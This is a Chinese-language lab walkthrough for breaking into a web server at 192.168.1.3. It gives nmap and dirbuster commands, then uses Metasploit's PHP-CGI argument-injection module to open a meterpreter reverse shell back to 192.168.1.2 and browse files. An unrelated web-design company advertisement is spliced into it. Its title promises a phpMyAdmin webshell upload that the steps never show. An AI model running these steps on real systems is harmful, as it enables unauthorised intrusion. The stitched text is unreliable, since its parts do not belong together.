利用phpMyAdmin漏洞上傳***程序,獲得webshell。
為山亭等地區(qū)用戶提供了全套網(wǎng)頁(yè)設(shè)計(jì)制作服務(wù),及山亭網(wǎng)站建設(shè)行業(yè)解決方案。主營(yíng)業(yè)務(wù)為做網(wǎng)站、成都做網(wǎng)站、山亭網(wǎng)站設(shè)計(jì),以傳統(tǒng)方式定制建設(shè)網(wǎng)站,并提供域名空間備案等一條龍服務(wù),秉承以專業(yè)、用心的態(tài)度為用戶提供真誠(chéng)的服務(wù)。我們深信只要達(dá)到每一位用戶的要求,就會(huì)得到認(rèn)可,從而選擇與我們長(zhǎng)期合作。這樣,我們也可以走得更遠(yuǎn)!
CGI腳本沒(méi)有正確處理請(qǐng)求參數(shù),導(dǎo)致源代碼泄露,允許遠(yuǎn)程***者在請(qǐng)求參數(shù)中插入執(zhí)行命令。
一、利用nmap工具掃描目標(biāo)主機(jī)
1.1使用nmap命令對(duì)目標(biāo)主機(jī)進(jìn)行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開(kāi)”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對(duì)目標(biāo)主機(jī)進(jìn)行端口掃描,發(fā)現(xiàn)開(kāi)放80端口。
1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問(wèn)目標(biāo)網(wǎng)站。
二、利用dirbuster掃描目標(biāo)主機(jī)
2.1在終端中輸入命令“dirbuster”,啟動(dòng)軟件對(duì)目標(biāo)網(wǎng)站進(jìn)行掃描。
2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典文件(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開(kāi)始掃描。
2.3掃描結(jié)果顯示包含cgi-bin目錄、phpmyadmin目錄等。
三、利用metasploit***目標(biāo)主機(jī)
3.1在終端中輸入命令“msfconsole”,啟動(dòng)MSF終端。
3.2在終端中輸入命令“search php_cgi”,搜索php_cgi的相關(guān)工具和***載荷。
3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啟用漏洞利用模塊, 提示符就會(huì)提示進(jìn)入到該路徑下。
3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠(yuǎn)程主機(jī)執(zhí)行的代碼,即shellcode。
3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設(shè)置使用的shellcode代碼。
3.6在終端中輸入“show options”,顯示***模塊需要設(shè)置的參數(shù)。
3.7在終端中輸入“set LHOST 192.168.1.2”,設(shè)置源主機(jī)的IP地址,用于會(huì)話的反向鏈接。
3.8在終端中輸入“set RHOST 192.168.1.3”,設(shè)置目標(biāo)主機(jī)的IP。
3.9在終端中輸入“exploit”,開(kāi)始對(duì)目標(biāo)主機(jī)進(jìn)行***。
3.10在終端中輸入“sysinfo”,查看系統(tǒng)環(huán)境信息。
3.11在終端中輸入“l(fā)s”,顯示當(dāng)前目錄下的文件內(nèi)容。
3.12在終端中輸入“cat phpinfo.php”,查看文件內(nèi)容。